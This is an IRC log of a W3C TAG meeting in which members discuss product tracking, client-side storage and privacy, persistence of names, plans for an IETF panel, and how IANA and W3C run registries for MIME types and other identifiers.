18:39:52 [noah] Hmm. I'm sure Larry is right about the history, but it seems preferable to me that the spec >should< say what extension points can do, and that the registrar merely enforce that
18:40:04 [noah] ack next
18:40:19 [timbl] PLH: We have a media type registry at W3C
18:40:42 [masinter] Register an Internet Media Type for a W3C Spec
18:41:16 [timbl] plh: Since Martin Dürst left the W3C team, I have been maintaining the big table at the bottom
18:41:22 [timbl] ... This table has been there for 8 years
18:42:11 [timbl] ... The old way of registering a media type is to just write an RFC, but a few years ago, with Martin's help, IETF allows other organizations' specs to be used in the IANA registration.
18:42:14 [plh] --> Status of Internet Media type registrations
18:43:06 [noah] TBL: Is N3 in the table?
18:43:15 [noah] PLH: No, my fault. Kick me.
18:43:19 [noah] TBL: Will do.
18:43:24 [timbl] PLH: I accept total responsibility for making sure that it is
18:43:51 [timbl] ... Many of these media types are here but not in the IANA registry.
18:44:24 [timbl] Larry: How many of these have been requested?
18:44:58 [timbl] PLH: If you look at the "Plans" column.
18:45:32 [timbl] I suggest that the states be defined in an ontology
18:45:55 [timbl] PLH: "Need ietf types review" means that W3C has yet to ask for that review.
18:46:46 [timbl] [discussion of W3C process]
18:47:04 [timbl] PLH: We have those steps to help working groups go through those processes.
18:47:23 [timbl] ... We can end up with things which just hang there
18:47:31 [noah] q?
18:47:35 [noah] ack next
18:47:36 [Zakim] ht, you wanted to ask what _is_ the problem at hand
18:47:52 [timbl] HT: What is the problem we are trying to fix now?
18:48:20 [timbl] PLH: The problem with SVG was getting it registered in 2010 after asking in 2004, with it being used in between.
18:48:31 [noah] PLH: For me the problem is that we requested an SVG media type in 2004, that only got formal approval in 2010, and it was used without registration for 6 years.
18:48:47 [noah] HT: OK, stipulate a problem with >that< registry, the TAG issue appears to be about issues in general.
18:49:35 [timbl] HT: Sounds like a bug in that registry -- let's suggest that they implement a tracker. That could be fixed. Automating the registry wouldn't necessarily help that.
The Xpointer scheme registry has a rule that the URI works and tells you the status the oment you have requested it.
18:50:13 [timbl] Larry: It would be nice to give IANA a heads up before the request -- an intent to register. You could post that they intend to register it.
18:50:25 [noah] q?
18:50:28 [timbl] Tim: propose that the IANA system should surface all the info in PLH's table
18:50:37 [masinter]
18:51:12 [masinter] but if OASIS and ISO and other organizations want to register values, shouldn't they also be visible to W3C members?
18:51:31 [ht] s/oment you have/moment you have requested, but that's a management decision, not a technical one/
18:51:35 [timbl] q+ to mention ontologies and schemas which we discussed before
18:52:40 [timbl] Larry: There is a place for lightweight registries -- e.g. MIME types many orgs can contribute to.
18:53:00 [timbl] q+
18:53:28 [timbl] Larry: W3C should try to fix IANA before running around it.
18:54:16 [timbl] ... We should volunteer to help them, and find a good way to integrate the web architecture of the registry with the Internet Architecture people.
18:55:09 [timbl] ... Specifically, as technical details, there are issues about the MIME types conflicting with the sniffing documents.
18:55:18 [plh] q+
18:55:54 [timbl] Noah: Do we want any more work on this?
18:56:23 [timbl] Larry: PLH is on the front line; he is being asked to run registries. As the TAG we can help out with arch issues.
18:56:39 [timbl] PLH: The immediate issue is issue 27, which is related to rel=""
18:56:52 [noah] Noah: to clarify, I was asking whether we needed to schedule or track work thats
18:56:58 [noah] that's beyond what we're already doing
18:57:06 [timbl] ... The next step is for counter proposals in the HTML WG.
18:57:07 [noah]
18:57:31 [noah] PLH: Potentially, the TAG might have a position to offer to the HTML WG
18:57:49 [noah] TBL: I'm not sure I'm hearing anyone around the table complain about anything.
18:57:52 [timbl] JAR: There are RFCs which point to the IANA registries.
18:58:08 [timbl] q?
18:58:10 [masinter]
18:58:13 [noah] ack next
18:58:19 [noah] JAR: We don't want two registries.
18:58:20 [plh] q-
18:58:43 [noah] TBL: Right, not two registries, and we want a good relationship with IANA. We do need something that will produce RDF.
18:59:00 [noah] JAR: Um, that can be a tarpit. I've already tried to convince IETF on that.
19:00:16 [noah].
19:00:57 [noah] TBL: IANA spent a long time working in plain text not HTML, a long time using ftp vs. http, they've slowly moved. I fear we might be talking a long time to make the move on conneg that returns RDF.
19:00:58 [masinter] I think people ascribe to "IANA" things that are really within their own control
19:01:24 [jar] well, not on exactly that, but on something closely related having to do with link relations and 200 status
19:01:24 [plh] --> Effects of a registry at W3C
19:01:28 [plh] q+
19:01:40 [masinter] there's no reason why W3C can't run a service for doing something with IANA registered terms, for example, by adding to the registry a set of "registered value retrieval services"
19:01:49 [noah] TBL: Meanwhile, there are cases where you want to pick up information etc. about a new media type dynamically, while browsing.
19:02:04 [noah] NM: Trust issues aside, you could even dynamically pick up handlers, e.g. to render a new image type.
19:02:14 [noah] TBL: Indeed, a very interesting rathole, but not now.
19:02:20 [masinter] q+ to talk about getting a document on 'registry requirements and operations' that talks also about the scalability issues
19:02:39 [noah] ack next
19:03:09 [timbl] The relationship between a MIME type and a typical file extension is important for security -- you must not store a file in a file system so that it looks as though it has a different MIME type, as that is a security hole.
19:03:43 [noah] ACTION-511?
19:03:43 [trackbot] ACTION-511 -- Larry Masinter to send email framing TAG work on registries -- due 2011-01-20 -- PENDINGREVIEW
19:03:43 [trackbot]
19:03:46 [timbl] PLH: Henry Sivonen suggests a very lightweight system for MIME types, with no real review.
19:04:09 [timbl] Larry: I think I hear enough technical and architectural issues and I am thinking of writing a finding about it.
19:04:15 [plh] a/with no real review/similar to the XPointer registry/
19:04:18 [noah] . ACTION: Larry to write draft finding on architectural good practice relating to registries
19:04:26 [plh] s/for MIME types/for re values/
19:04:37 [noah] . ACTION: Larry to write draft document on architectural good practice relating to registries
19:05:01 [noah] s/good/issues and good/
19:05:04 [timbl] .. Larry: I would like to write about arch. issues and good practices.
19:05:30 [noah] ACTION: Larry to write draft document on architectural good practice relating to registries Due 2011-04-19
19:05:30 [trackbot] Created ACTION-531 - Write draft document on architectural good practice relating to registries Due 2011-04-19 [on Larry Masinter - due 2011-02-17].
19:07:30 [timbl] ----------------------------------------------
19:07:49 [timbl] topic: Issue Tracking
19:08:11 [timbl] NM: What does "open" mean for an issue?
19:08:50 [timbl] ... For those we are not working on actively, we should categorize them.
19:08:53 [plh] plh has left #tagmem
19:09:35 [timbl] ... We should close the ones which have been overtaken by events.
19:10:56 [noah]
19:11:04 [timbl] NM: re Issue-7
19:11:04 [noah] ISSUE-7: (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?)
19:11:04 [trackbot] ISSUE-7 (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?) notes added
19:11:10 [timbl] Is this still relevant?
19:11:32 [timbl] Larry: PING attributes ping a server to show you took a link
19:11:49 [timbl] Larry: They are in the WHATWH spec still.
19:12:18 [timbl] ... but not in the W3C spec.
19:12:24 [noah] LM: We should worry about the W3C spec.
19:12:29 [timbl] Larry: This battle has been fought.
19:12:37 [masinter] s/They are/It might be/
19:12:43 [masinter] s/WHATWH/WHATWG/
19:13:00 [noah] NM: Disagree, at least in principle. If any organization is promoting widespread use of something we consider inappropriate, that's potentially of concern to the TAG.
19:13:06 [noah] TBL: Yes, but we have to pick our battles.
19:13:13 [noah] HT: What about the original XForms issue?
19:13:19 [timbl] HT: Is XForms actually using GET when it should? And those who use it use POST not GET, and that is how the XForms architecture is designed to work.
19:13:33 [timbl] ... I didn't realize there is a tension there.
19:13:42 [masinter] I defined MIME type multipart/form-data in
19:13:51 [timbl] ... But XForms uses POST just in order to have an XML body.
19:14:44 [timbl] Larry: Let's close this without prejudice.
19:15:03 [noah] TBL: Let's close it without prejudice
19:15:08 [noah] NM: Fine with me
19:15:35 [timbl] TrackBot, Close ISSUE-7
19:15:35 [trackbot] ISSUE-7 (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?) closed
19:15:58 [noah] RESOLUTION: We will (re)close ISSUE-7, without prejudice with respect to HTML ping being good/bad
19:16:05 [noah] close ISSUE-7
19:16:05 [trackbot] ISSUE-7 (1) GET should be encouraged, not deprecated, in XForms(2) How to handle safe queries (New POST-like method?GET plus a body?) closed
19:16:37 [timbl] -----
19:16:41 [noah]
19:16:44 [timbl] Issue-20:
19:16:44 [trackbot] ISSUE-20 What should specifications say about error handling? notes added
19:16:46 [noah] ISSUE-20: What should specifications say about error handling?
19:16:46 [trackbot] ISSUE-20 What should specifications say about error handling? notes added
19:17:17 [timbl] HT: If this is being pursued it would be in the XML HTML TF
19:17:28 [noah] Last status change was: connecting with "HTML 5 review" product a la
19:17:31 [timbl] HT: Propose this has been overtaken by events.
19:17:39 [noah] HT: I think this is overtaken or subsumed wrt/HTML.
19:17:50 [noah] LM: Those are specific instances, but there's a broader concern here.
19:18:02 [timbl] Larry: Those are specific instances -- we have, though, a general set of conservative/liberal, error handling etc. concerns here.
19:18:26 [timbl] Larry: Like, if you dictate what happens exactly with every error, are they still errors?
19:18:49 [timbl] HT: On a scale of 1..10, that concern is for me a 2
19:19:10 [timbl] ... in terms of its importance to the TAG.
19:19:24 [noah]
19:20:04 [timbl] Noah: Look at the history. We closed it in 2003 - Chris L in 2003 -- the TAG closed it in 2003
19:20:24 [timbl] Noah: In 2008, on Dec 9, we re-opened it specifically about HTML5 Tag Soup.
19:20:36 [timbl] ... So HT's comment does indeed carry the day.
19:21:02 [timbl] Tim: Suggest open, work happening in XML HTML task force.
19:21:08 [timbl] q+
19:22:02 [masinter] mark it as "PENDING REVIEW"?
19:24:44 [ht] It appears that @ping has been removed from HTML5[W3C], remains in HTML[WHATWG], but is not receiving much (any?) implementation
19:25:12 [noah] Added note to ISSUE-7: Reviewed status of this at 10 Feb 2011 (8-10 Feb) F2F. Decided to leave this open for now, pending better understanding of where the XML/HTML Unification Task force is going with related issues.
19:25:21 [ht] This is from HTML WG issue 1
19:25:23 [noah] s/7/20/
19:25:38 [timbl] ----------
19:25:45 [timbl] Noah: What about Issue-24
19:25:53 [timbl] Larry: Let's leave it open
19:26:03 [timbl] Noah: Issue-25 Deep Linking -- any actions?
19:26:19 [timbl] DKA: I made a very sketchy draft -- needs discussion
19:26:38 [timbl] Noah: Stays open, you have an action for it.
19:26:48 [DKA]
19:27:06 [timbl] JAR: Issue 31 was re-opened for UMP.
19:28:40 [timbl] Noah: Issue-31 stays open. ACTION-344 now is associated with it
19:29:12 [masinter] issue-31?
19:29:12 [trackbot] ISSUE-31 -- Should metadata (e.g., versioning information) be encoded in URIs? -- open
19:29:12 [trackbot]
19:31:56 [DKA]
19:32:26 [timbl] Noah: We close 33 as no objections heard
19:32:31 [masinter] issue-33?
19:32:31 [trackbot] ISSUE-33 -- Composability for user interface-oriented XML namespaces -- open
19:32:31 [trackbot]
19:32:36 [noah] RESOLUTION: Closing ISSUE-33 because CDF is gone, and any concerns about SVG, MathML, etc. in HTML are being tracked elsewhere.
19:32:41 [noah] close ISSUE-33
19:32:41 [trackbot] ISSUE-33 Composability for user interface-oriented XML namespaces closed
19:32:56 [timbl] ------------
19:33:00 [masinter] issue-34?
19:33:00 [trackbot] ISSUE-34 -- XML Transformation and composability (e.g., XSLT, XInclude, Encryption) -- open
19:33:00 [trackbot]
19:33:04 [timbl] Issue-37?
19:33:04 [trackbot] ISSUE-37 -- Definition of abstract components with namespace names and frag ids -- open
19:33:04 [trackbot]
19:33:10 [masinter] issue-39?
19:33:10 [trackbot] ISSUE-39 -- Meaning of URIs in RDF documents -- open
19:33:10 [trackbot]
19:33:25 [noah] "The community needs:
19:33:25 [noah] A concise statement of the above architectural elements from different specs in one place, written in terms which the ontology community will understand, with pointers to the relevant specifications."
19:35:32 [timbl] JAR: I wondered about opening an Issue for Harry Halpin's concerns. The problem with doing # or 303.
19:38:26 [timbl] timbl: Let's not re-define issues under the same number, that is fraud :-)
19:43:41 [noah] ACTION: Jonathan to propose changes to status of issue-39 & issue-57, and perhaps opening new issue relating to H. Halpin's concerns about 200 responses Due: 2011-02-22
19:43:41 [trackbot] Created ACTION-532 - Propose changes to status of issue-39 & issue-57, and perhaps opening new issue relating to H. Halpin's concerns about 200 responses Due: 2011-02-22 [on Jonathan Rees - due 2011-02-17].
19:45:23 [noah] topic: assembling the minutes
19:45:26 [noah] Day 1: Dan
19:45:30 [noah] Day 2: Larry
19:45:44 [noah] Day 3: Henry
19:45:48 [timbl] BREAK
19:51:28 [DKA] DKA has joined #tagmem
19:58:52 [Ashok] Ashok has joined #tagmem
20:06:06 [timbl] </break>
20:06:21 [timbl] Noah: Now going through action items
20:06:36 [noah]
20:06:46 [timbl] Noah: Now going through action items
20:07:50 [masinter] masinter has joined #tagmem
20:07:57 [timbl] Action-505?
20:07:57 [trackbot] ACTION-505 -- Daniel Appelquist to start a document wrt issue-25 -- due 2011-01-25 -- OPEN
20:07:57 [trackbot]
20:08:12 [timbl] DKA: Do we need a TAG finding here?
20:08:31 [timbl] Noah: Take us to the point where we are ready for discussion.
20:09:07 [timbl] DKA: I need someone to help me on this
20:09:16 [timbl] JAR: We could talk.
20:09:48 [noah] At Feb 2011 F2F, Jonathan agrees to give Dan a bit of help. Next goal is for them to take us to the point where we are ready for telcon discussion.
20:10:10 [noah] ACTION-505 Due 2011-03-01
20:10:10 [trackbot] ACTION-505 Start a document wrt issue-25 due date now 2011-03-01
20:10:22 [timbl] Action-507?
20:10:22 [trackbot] ACTION-507 -- Daniel Appelquist to with Noah to suggest next steps for TAG on privacy -- due 2011-03-01 -- OPEN
20:10:22 [trackbot]
20:10:49 [timbl] DKA: We didn't come up with a product page for the over-arching product on privacy.
20:11:24 [timbl] Noah: The product page is to define work the TAG will do.
20:11:46 [timbl] action continues.
20:11:46 [trackbot] Sorry, bad ACTION syntax
20:12:33 [noah] ACTION-460 Due 2011-03-08
20:12:33 [trackbot] ACTION-460 Coordinate with IAB regarding next steps on privacy policy due date now 2011-03-08
20:13:02 [noah] ACTION-480 Due 2011-03-01
20:13:02 [trackbot] ACTION-480 Draft overview document framing Web applications as opposed to traditional Web of documents Due: 2010-11-01 due date now 2011-03-01
20:14:23 [noah] ACTION-116?
20:14:23 [trackbot] ACTION-116 -- Tim Berners-Lee to align the tabulator internal vocabulary with the vocabulary in the rules, getting changes to either as needed. -- due 2011-02-11 -- OPEN
20:14:23 [trackbot]
20:14:59 [noah] JAR: Tim took this on himself, up to him whether to proceed
20:15:19 [noah] TBL: OK, maybe this is overtaken by events
20:16:14 [noah] Agreed on Feb 10 2011 at F2F Jonathan will move this to become an AWWSW action
20:16:41 [noah] close ACTION-116
20:16:41 [trackbot] ACTION-116 Align the tabulator internal vocabulary with the vocabulary in the rules, getting changes to either as needed. closed
20:17:20 [noah] ACTION-510?
20:17:20 [trackbot] ACTION-510 -- Tim Berners-Lee to write a note conveying the TAG's concerns re: the microdata -> RDF URI mappings in the HTML5 microdata draft Due: 2011-01-20 -- due 2011-01-13 -- OPEN
20:17:20 [trackbot]
20:18:59 [noah] ACTION-510 Due 2011-03-09
20:19:00 [trackbot] ACTION-510 Write a note conveying the TAG's concerns re: the microdata -> RDF URI mappings in the HTML5 microdata draft Due: 2011-01-20 due date now 2011-03-09
20:19:23 [noah] John Kemp's action:
20:19:28 [noah] ACTION-355?
20:19:29 [trackbot] ACTION-355 -- John Kemp to explore the degree to which AWWW and associated findings tell the interaction story for Web Applications -- due 2011-02-02 -- OPEN
20:19:29 [trackbot]
20:20:20 [noah] ACTION-504?
20:20:20 [trackbot] ACTION-504 -- John Kemp to make sure ACTION-355 links all significant writings including use cases. -- due 2011-01-27 -- OPEN
20:20:20 [trackbot]
20:20:28 [noah] note that 504 is linked to 355
20:20:48 [noah] JK: Unclear whether anyone is interested.
20:23:30 [noah] NM: We could do a product page. Could be one with resource assigned and dates, or could be a partial product page, with blanks for assigned resource and dates
20:23:57 [noah] JK: Originally, the idea was to fill out a piece that is called out as missing in AWWW, i.e. to cover non-HTTP interactions.
20:24:10 [noah] JK: I think that's where Noah's original succession
20:24:21 [noah] JAR: At least, let's not let this get lost
20:25:00 [johnk] johnk has joined #tagmem
20:25:09 [johnk] s/succession/suggestion/
20:28:42 [timbl]
20:30:07 [noah] close ACTION-504
20:30:07 [trackbot] ACTION-504 Make sure ACTION-355 links all significant writings including use cases. closed
20:30:17 [noah] ACTION-416?
20:30:17 [trackbot] ACTION-416 -- John Kemp to work on diagrams in "From Server-side to client-side" section of webapps material -- due 2011-03-01 -- OPEN
20:30:17 [trackbot]
20:30:39 [noah] JK: That's in Ashok's Web App document. I've made no recent progress.
20:31:05 [noah] JK: What to do [depends on] whether you will work on the future Web applications document. Ashok now has control of the pertinent document.
20:31:35 [noah] NM: Ashok, do you have an action associated with that?
20:33:17 [johnk]
20:34:21 [johnk] ACTION-417?
20:34:21 [trackbot] ACTION-417 -- John Kemp to frame section 7, security -- due 2011-01-25 -- CLOSED
20:34:21 [trackbot]
20:34:26 [noah]
20:36:20 [noah] close ACTION-416
20:36:20 [trackbot] ACTION-416 Work on diagrams in "From Server-side to client-side" section of webapps material closed
20:36:50 [noah] ACTION-508?
20:36:50 [trackbot] ACTION-508 -- Larry Masinter to draft proposed bug report regarding interpretation of fragid in HTML-based AJAX apps Due: 2011-01-03 -- due 2011-02-22 -- OPEN
20:36:50 [trackbot]
20:37:33 [noah] LM: Discussed Tues.
20:37:40 [noah] ACTION-531?
20:37:40 [trackbot] ACTION-531 -- Larry Masinter to write draft document on architectural good practice relating to registries Due 2011-04-19 -- due 2011-02-17 -- OPEN 20:37:40 [trackbot] 20:38:04 [noah] ACTION-515? 20:38:04 [trackbot] ACTION-515 -- Larry Masinter to (as trackbot proxy for John) who will publish, slightly cleaned up, with help from Noah and Larry Due: 2011-03-07 -- due 2011-02-15 -- OPEN 20:38:04 [trackbot] 20:38:31 [noah] ACTION-525? 20:38:31 [trackbot] ACTION-525 -- Noah Mendelsohn to check with John before closing WebApps access control -- due 2011-02-17 -- OPEN 20:38:31 [trackbot] 20:38:56 [noah] ACTION-529? 20:38:56 [trackbot] ACTION-529 -- Noah Mendelsohn to schedule telcon discussion of a potential TAG product relating to offline applications and packaged Web -- due 2011-02-17 -- OPEN 20:38:56 [trackbot] 20:39:19 [noah] close ACTION-513 20:39:19 [trackbot] ACTION-513 Do F2F agenda closed 20:39:42 [noah] ACTION-501? 20:39:42 [trackbot] ACTION-501 -- Noah Mendelsohn to follow up on whether GeoLocation finds reasonable answer on giving permission per site/app etc [self-assigned] -- due 2011-03-01 -- OPEN 20:39:42 [trackbot] 20:40:04 [noah] ACTION-379? 20:40:04 [trackbot] ACTION-379 -- Noah Mendelsohn to check whether HTML language reference has been published -- due 2011-02-08 -- OPEN 20:40:04 [trackbot] 20:42:07 [noah] ACTION-379 Due 2011-03-09 20:42:07 [trackbot] ACTION-379 Check whether HTML language reference has been published due date now 2011-03-09 20:42:34 [masinter] why isn't this document listed in 20:45:01 [noah] ACTION-344? 20:45:01 [trackbot] ACTION-344 -- Jonathan Rees to alert TAG chair when CORS and/or UMP goes to LC to trigger security review -- due 2011-02-15 -- OPEN 20:45:01 [trackbot] 20:45:07 [noah] Leave for now, moving ahead. 20:45:13 [noah] ACTION-532? 20:45:13 [trackbot] ACTION-532 -- Jonathan Rees to propose changes to status of issue-39 & issue-57, and perhaps opening new issue relating to H. Halpin's concerns about 200 responses Due: 2011-02-22 -- due 2011-02-17 -- OPEN 20:45:13 [trackbot] 20:45:24 [noah] ACTION-381? 20:45:24 [trackbot] ACTION-381 -- Jonathan Rees to spend 2 hours helping Ian with -- due 2011-02-11 -- OPEN 20:45:24 [trackbot] 20:45:53 [noah] ACTION-509? 20:45:53 [trackbot] ACTION-509 -- Jonathan Rees to communicate with RDFa WG regarding documenting the fragid / media type issue -- due 2011-01-29 -- OPEN 20:45:53 [trackbot] 20:46:08 [noah] JAR: I've been working with Manu 20:46:17 [noah] ACTION-509 Due 2011-03-15 20:46:17 [trackbot] ACTION-509 Communicate with RDFa WG regarding documenting the fragid / media type issue due date now 2011-03-15 20:46:20 [noah] ACTION-509 Due 2011-02-15 20:46:21 [trackbot] ACTION-509 Communicate with RDFa WG regarding documenting the fragid / media type issue due date now 2011-02-15 20:46:50 [noah] ACTION-477? 20:46:50 [trackbot] ACTION-477 -- Henry S. Thompson to organize meeting on persistence of domains -- due 2011-03-15 -- OPEN 20:46:50 [trackbot] 20:47:12 [noah] ACTION-33? 20:47:12 [trackbot] ACTION-33 -- Henry S. Thompson to revise naming challenges story in response to Dec 2008 F2F discussion -- due 2011-01-31 -- OPEN 20:47:12 [trackbot] 20:48:02 [noah] ACTION-33 Due 2011-03-08 20:48:02 [trackbot] ACTION-33 revise naming challenges story in response to Dec 2008 F2F discussion due date now 2011-03-08 20:48:51 [noah] ACTION-440? 20:48:51 [trackbot] ACTION-440 -- Henry S. 
Thompson to ask Hixie what is meant in this [section 9.2] by "retrieving an external entity" and could some clarification be added. -- due 2011-02-01 -- OPEN
20:48:51 [trackbot]
20:49:28 [noah] ACTION-440 Due 2011-02-22
20:49:28 [trackbot] ACTION-440 Ask Hixie what is meant in this [section 9.2] by "retrieving an external entity" and could some clarification be added. due date now 2011-02-22
20:49:49 [noah] ACTION-23?
20:49:49 [trackbot] ACTION-23 -- Henry S. Thompson to track progress of #int bug 1974 in the XML Schema namespace document in the XML Schema WG -- due 2011-01-19 -- OPEN
20:49:49 [trackbot]
20:50:16 [noah] HT: Reviewed state of this, saw something on the XML Schema mailing list implying done, but found closed in error.
20:50:32 [noah] HT: The bit we care about still hasn't been [fixed], I'm still monitoring.
20:50:45 [noah] ACTION-23 Due 2011-05-01
20:50:45 [trackbot] ACTION-23 track progress of #int bug 1974 in the XML Schema namespace document in the XML Schema WG due date now 2011-05-01
20:51:34 [noah] topic: Pending review actions
20:51:39 [noah] ACTION-421?
20:51:39 [trackbot] ACTION-421 -- Henry S. Thompson to frame the discussion of EXI deployment at a future meeting -- due 2011-01-21 -- PENDINGREVIEW
20:51:39 [trackbot]
20:51:46 [noah] HT: I was asked to find out the deal on deployment.
20:52:16 [noah] HT: Sent a note to the list and got an answer from John Schneider. Please schedule discussion.
20:52:54 [noah] ACTION-511?
20:52:55 [trackbot] ACTION-511 -- Larry Masinter to send email framing TAG work on registries -- due 2011-01-20 -- PENDINGREVIEW
20:52:55 [trackbot]
20:53:49 [noah] LM: I took another ACTION-531, close ACTION-511
20:54:46 [noah] close ACTION-511
20:54:46 [trackbot] ACTION-511 Send email framing TAG work on registries closed
20:55:03 [noah] ACTION-512?
20:55:03 [trackbot] ACTION-512 -- Noah Mendelsohn to do F2F local arrangements -- due 2011-01-27 -- PENDINGREVIEW
20:55:03 [trackbot]
20:55:07 [noah] close ACTION-512
20:55:07 [trackbot] ACTION-512 Do F2F local arrangements closed
21:00:01 [noah] ACTION: Noah to schedule TAG discussion of !# (check with Yves) [self-assigned]
21:00:01 [trackbot] Created ACTION-533 - Schedule TAG discussion of !# (check with Yves) [self-assigned] [on Noah Mendelsohn - due 2011-02-17].
21:05:31 [DKA] DKA has joined #tagmem
21:07:07 [noah] topic: EXI
21:07:37 [noah] scribenick: noah
21:11:25 [noah] HT: There are 3 implementations linked from the home page, 1 proprietary, 2 open source.
21:31:53 [jar] q+ dka to talk about exi
21:32:08 [ht] q- masinter
21:35:24 [ht] ack timbl
21:35:30 [ht] ack dka
21:35:30 [Zakim] dka, you wanted to talk about exi
21:47:27 [noah] We are adjourned
21:50:18 [jar] jar has joined #tagmem
22:07:58 [timbl] timbl has joined #tagmem
22:10:26 [ndw] ndw has joined #tagmem
22:57:16 [Norm] Norm has joined #tagmem
http://www.w3.org/2011/02/10-tagmem-irc
CC-MAIN-2015-06
en
refinedweb
Date handling is one of the web’s inevitables. Almost any web application you write is going to include some form of date-bound hacking. Whether it’s capturing user input via a web form, calculating the difference between two times, or fetching data via a date range, time and the web are closely linked. Luckily for us, Rails makes handling dates and times, like everything else, fairly trivial; that is, once you have an idea of how everything works. I recently rewrote the section of our admin site in Rails that handles the creation of back issues. Since I had to hunt all over the web for a complete package of documentation to finalize this small task, I thought it might be a good idea to share my experience. In the interest of time we’ll assume you have a Rails app up and running and have controllers and models in place that you’re looking to add date-handling code to.

Form Helpers

Let’s start with data capture via a simple web form. When storing a back issue in the database the most important data we need to capture is its print date. As far as our back issues are concerned, print date is just a month and a year. To accomplish this, Rails provides a few FormHelpers for picking dates that we’ll use in our view.

/app/view/back_issues/new.rhtml

<%= error_messages_for :back_issue %>
<% form_for :back_issue do |f| %>
  Print Month: <%= select_month(Date.today, :field_name => "print_month") %>
  Print Year: <%= select_year(Date.today, :start_year => 1999, :field_name => "print_year") %>
  <%= submit_tag value='Create Backissue' %>
<% end %>

select_month() and select_year() generate pulldown menus for picking the issue’s month and year. Pay special attention to the :field_name option. It’s not documented well in the Rails API proper and will come in handy when you need to change the name of these select boxes to something other than the default of date[month] and date[year]; necessary if you are using multiple instances of these helpers in a single form.

For still greater control over a date submitted via a form, you might want to take a look at select_datetime, which provides a pulldown for each element of a timestamp. Or for something a little more user friendly, check out the really nice Prototype-based Calendar Date Select.

Storing the Data

There’s no real reason for us to store the values from these two fields in separate database columns. Rather we’ll use the month and year values to construct a date in the controller and store the result in a single datetime field called print_date.

/app/controllers/back_issue_controller.rb

class BackIssuesController < ApplicationController
  def new
    @back_issue = BackIssue.new(params[:back_issue])
    return unless request.post?
    @back_issue.print_date = Date.new(params[:date]['print_year'].to_i, params[:date]['print_month'].to_i)
    @back_issue.save!
    flash[:notice] = "New back issue created."
    redirect_to "/covers/new?bi=" + @back_issue.id.to_s
  # In the event our validations fail
  rescue ActiveRecord::RecordInvalid
    render :action => 'new'
  end
end

Ok, that should do it. Once we’ve created an instance of @back_issue with the parameters from the form, we have access to print_date and can give it a newly constructed datetime with Date.new(). Date.new() can take three parameters (year, month, day). We’re taking the default of 1 on the day parameter by not passing anything to the method. In this example, we’re really only concerned with the month and year so the default is fine.
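For example, a quick check in the console (the values here are just illustrative):

>> Date.new(2007, 8).to_s
=> "2007-08-01"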
In reality, the new() method on our BackIssuesController is actually a bit more complex than this – hence the params[:back_issue] – but for the sake of simplicity, we’re just showing how to push a new date into the print_date column from pulldown menus. The redirect_to in this case points to our cover upload form, but you can point it to whatever destination you like following a successful save!.

Manipulating Dates

We don’t actually need to modify the date after it’s submitted to our controller, but if we did, Ruby has a few operators for quickly adjusting a Date object. Pretty simple stuff. To demonstrate, let’s take these operators for a spin on the console.

>> d = Date.new(2007, 8, 23)
=> #
>> d.to_s
=> "2007-08-23"
>> yesterday = d-1
=> #
>> yesterday.to_s
=> "2007-08-22"
>> tomorrow = d+1
=> #
>> tomorrow.to_s
=> "2007-08-24"
>> lastmonth = d<<1
=> #
>> lastmonth.to_s
=> "2007-07-23"
>> nextmonth = d>>1
=> #
>> nextmonth.to_s
=> "2007-09-23"

Displaying Dates

Alright, now that we’ve written our back issue date to the database, all that’s left to do is display it in a view. We probably don’t want to display the date formatted as it’s stored: ‘YYYY-MM-DD’. Rather we want something like the current back issue page that displays the full month name and the year. To accomplish this we’ll use strftime().

If you’re familiar with PHP’s date() method, strftime() is similar: you pass the method a format string that defines how you want the date output. The difference is that while you pass PHP’s date() both a format and a timestamp, strftime() is a method that operates on a Date object. And everything in Rails is an object.

Rails automatically knows to treat our datetime columns in the database as Date objects, so, after you’ve fetched the back issue data from the database in the controller, formatting the date in the view is as simple as:

<%= @back_issue.print_date.strftime('%B %Y') %>

Which will print something like “January 2007” to the screen. For a full list of format codes for strftime(), see the table below.

Rails Magic Wishlist

And that’s about it. Not too difficult but it’s actually a little more work than I’d like to do. Frankly, I wish there was some Rails magic that did the date handling in the controller for me. Creating a new date and casting parameters in the controller isn’t how I’d like this to function — ultimately it doesn’t strike me as terribly DRY. Rather, I would like to have the option of passing the form fields to the controller as back_issue[print_date_month] and back_issue[print_date_year] and have Rails realize that these are components of my print_date field and compile these elements into a date for me. But all-in-all the solution we have here is reasonably clean and maybe I can build some of that magic into a plugin or helper at a later date.
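Until then, here is a minimal sketch of what that missing magic could look like. Everything in it is hypothetical: the module, the compose_date! method, and the back_issue[print_date_year]/back_issue[print_date_month] parameter layout are assumptions for illustration, not part of Rails.

require 'date'  # not needed inside a Rails app, included so the sketch stands alone

# A hypothetical helper: collapse "#{field}_year" and "#{field}_month"
# params into a single Date under params[field], defaulting the day to 1.
module ComposesDates
  def compose_date!(attrs, field)
    year  = attrs.delete("#{field}_year")
    month = attrs.delete("#{field}_month")
    attrs[field] = Date.new(year.to_i, month.to_i) if year && month
    attrs
  end
end

Mixed into a controller, the new action could then call compose_date!(params[:back_issue], 'print_date') before handing the params straight to BackIssue.new.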
http://www.linux-mag.com/id/4070/
CC-MAIN-2015-06
en
refinedweb
Covariance and Contravariance are terms used in programming languages and set theory to define the behaviour of parameter and return types of a function. Yes, that’s a mouthful, but in a nutshell:
- Covariance allows the return type of an overriding function to be a subtype (something more derived) of the return type declared by the original base class
- Contravariance allows the parameter types of an overriding function to be super-types (something more general) of the declared parameter types, and not necessarily sub-types

Nothing better than using an example:

public abstract class Animal
{
    public abstract Animal CreateChild();
}

public class Human : Animal
{
    public override Animal CreateChild() { return new Human(); }
}

public class Dog : Animal
{
    public override Dog CreateChild() { return new Dog(); }
}

In this example:
- Animal is a superclass.
- Human is a subclass of Animal, whose override of the CreateChild method keeps the base return type Animal (invariant, i.e. no change)
- Dog is a subclass of Animal, with a covariant override of the CreateChild method to return the stronger type Dog

(Note that C# does not actually allow covariant return types on method overrides, so the Dog example is conceptual rather than compilable C#.)

More reading on Eric Lippert’s blog series on Covariance and Contravariance in C#

EDIT: I thought it prudent to clarify that this is only one example of where variance is used. Method signatures, delegates and arrays are some more examples of where the theory of co- and contravariance can be found.
http://www.xerxesb.com/2008/coveriance-and-contravariance/
CC-MAIN-2015-06
en
refinedweb
Copyright © 2012 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.

